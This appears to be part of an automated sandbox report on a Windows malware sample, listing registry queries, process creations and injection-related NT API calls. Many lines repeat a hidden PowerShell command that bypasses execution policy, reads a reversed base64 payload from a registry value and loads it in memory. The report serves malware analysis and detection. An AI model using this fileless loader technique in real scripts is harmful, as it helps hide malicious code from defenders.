Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	Jump to behavior

Writes or reads registry keys via WMI

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\LKeZAYNmpVLnixJ' -Name 's').s \| ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('LKeZAYNmpVLnixJ')	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009DC953 NtClose,	13_2_009DC953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A35C0 NtCreateMutant,LdrInitializeThunk,	13_2_053A35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_053A2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_053A2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2B60 NtClose,LdrInitializeThunk,	13_2_053A2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A4650 NtSuspendThread,	13_2_053A4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A3010 NtOpenDirectoryObject,	13_2_053A3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A3090 NtSetValueKey,	13_2_053A3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A4340 NtSetContextThread,	13_2_053A4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2D30 NtUnmapViewOfSection,	13_2_053A2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2D10 NtMapViewOfSection,	13_2_053A2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A3D10 NtOpenProcessToken,	13_2_053A3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2D00 NtSetInformationFile,	13_2_053A2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A3D70 NtOpenThread,	13_2_053A3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2DB0 NtEnumerateKey,	13_2_053A2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2DD0 NtDelayExecution,	13_2_053A2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2C00 NtQueryInformationProcess,	13_2_053A2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2C60 NtCreateKey,	13_2_053A2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2CA0 NtQueryInformationToken,	13_2_053A2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2CF0 NtOpenProcess,	13_2_053A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2CC0 NtQueryVirtualMemory,	13_2_053A2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2F30 NtCreateSection,	13_2_053A2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2F60 NtCreateProcessEx,	13_2_053A2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2FB0 NtResumeThread,	13_2_053A2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2FA0 NtQuerySection,	13_2_053A2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2F90 NtProtectVirtualMemory,	13_2_053A2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2FE0 NtCreateFile,	13_2_053A2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2E30 NtWriteVirtualMemory,	13_2_053A2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2EA0 NtAdjustPrivilegesToken,	13_2_053A2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2E80 NtReadVirtualMemory,	13_2_053A2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2EE0 NtQueueApcThread,	13_2_053A2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A39B0 NtGetContextThread,	13_2_053A39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2BA0 NtEnumerateValueKey,	13_2_053A2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2B80 NtQueryInformationFile,	13_2_053A2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2BF0 NtAllocateVirtualMemory,	13_2_053A2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2BE0 NtQueryValueKey,	13_2_053A2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2AB0 NtWaitForSingleObject,	13_2_053A2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2AF0 NtWriteFile,	13_2_053A2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A2AD0 NtReadFile,	13_2_053A2AD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A4340 NtSetContextThread,LdrInitializeThunk,	18_2_037A4340
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A4650 NtSuspendThread,LdrInitializeThunk,	18_2_037A4650
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A35C0 NtCreateMutant,LdrInitializeThunk,	18_2_037A35C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2B60 NtClose,LdrInitializeThunk,	18_2_037A2B60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	18_2_037A2BF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2BE0 NtQueryValueKey,LdrInitializeThunk,	18_2_037A2BE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2BA0 NtEnumerateValueKey,LdrInitializeThunk,	18_2_037A2BA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2AF0 NtWriteFile,LdrInitializeThunk,	18_2_037A2AF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2AD0 NtReadFile,LdrInitializeThunk,	18_2_037A2AD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A39B0 NtGetContextThread,LdrInitializeThunk,	18_2_037A39B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2F30 NtCreateSection,LdrInitializeThunk,	18_2_037A2F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2FE0 NtCreateFile,LdrInitializeThunk,	18_2_037A2FE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2FB0 NtResumeThread,LdrInitializeThunk,	18_2_037A2FB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2EE0 NtQueueApcThread,LdrInitializeThunk,	18_2_037A2EE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2E80 NtReadVirtualMemory,LdrInitializeThunk,	18_2_037A2E80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	18_2_037A2D30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2D10 NtMapViewOfSection,LdrInitializeThunk,	18_2_037A2D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	18_2_037A2DF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2DD0 NtDelayExecution,LdrInitializeThunk,	18_2_037A2DD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	18_2_037A2C70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2C60 NtCreateKey,LdrInitializeThunk,	18_2_037A2C60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2CA0 NtQueryInformationToken,LdrInitializeThunk,	18_2_037A2CA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A3010 NtOpenDirectoryObject,	18_2_037A3010
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A3090 NtSetValueKey,	18_2_037A3090
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2B80 NtQueryInformationFile,	18_2_037A2B80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2AB0 NtWaitForSingleObject,	18_2_037A2AB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2F60 NtCreateProcessEx,	18_2_037A2F60
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2FA0 NtQuerySection,	18_2_037A2FA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2F90 NtProtectVirtualMemory,	18_2_037A2F90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2E30 NtWriteVirtualMemory,	18_2_037A2E30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2EA0 NtAdjustPrivilegesToken,	18_2_037A2EA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A3D70 NtOpenThread,	18_2_037A3D70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A3D10 NtOpenProcessToken,	18_2_037A3D10
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2D00 NtSetInformationFile,	18_2_037A2D00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2DB0 NtEnumerateKey,	18_2_037A2DB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2C00 NtQueryInformationProcess,	18_2_037A2C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2CF0 NtOpenProcess,	18_2_037A2CF0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A2CC0 NtQueryVirtualMemory,	18_2_037A2CC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D796D0 NtDeleteFile,	18_2_02D796D0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D79780 NtClose,	18_2_02D79780
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D79470 NtCreateFile,	18_2_02D79470
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D795E0 NtReadFile,	18_2_02D795E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D798F0 NtAllocateVirtualMemory,	18_2_02D798F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C87C3	13_2_009C87C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C69BF	13_2_009C69BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C69C3	13_2_009C69C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009BE153	13_2_009BE153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009C0163	13_2_009C0163
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009BE297	13_2_009BE297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009BE2A3	13_2_009BE2A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B44DA	13_2_009B44DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009DEFA3	13_2_009DEFA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009BFF3F	13_2_009BFF3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009B2F50	13_2_009B2F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_009BFF43	13_2_009BFF43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05427571	13_2_05427571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05430591	13_2_05430591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540D5B0	13_2_0540D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05422446	13_2_05422446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542F43F	13_2_0542F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541E4F6	13_2_0541E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370770	13_2_05370770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05394750	13_2_05394750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542F7B0	13_2_0542F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536C7C0	13_2_0536C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054216CC	13_2_054216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538C6E0	13_2_0538C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543B16B	13_2_0543B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05360100	13_2_05360100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535F172	13_2_0535F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053A516C	13_2_053A516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540A118	13_2_0540A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F8158	13_2_053F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537B1B0	13_2_0537B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054281CC	13_2_054281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054301AA	13_2_054301AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F0CC	13_2_0541F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542F0E0	13_2_0542F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054270E9	13_2_054270E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053770C0	13_2_053770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542A352	13_2_0542A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542132D	13_2_0542132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535D34C	13_2_0535D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053B739A	13_2_053B739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054303E6	13_2_054303E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537E3F0	13_2_0537E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05410274	13_2_05410274
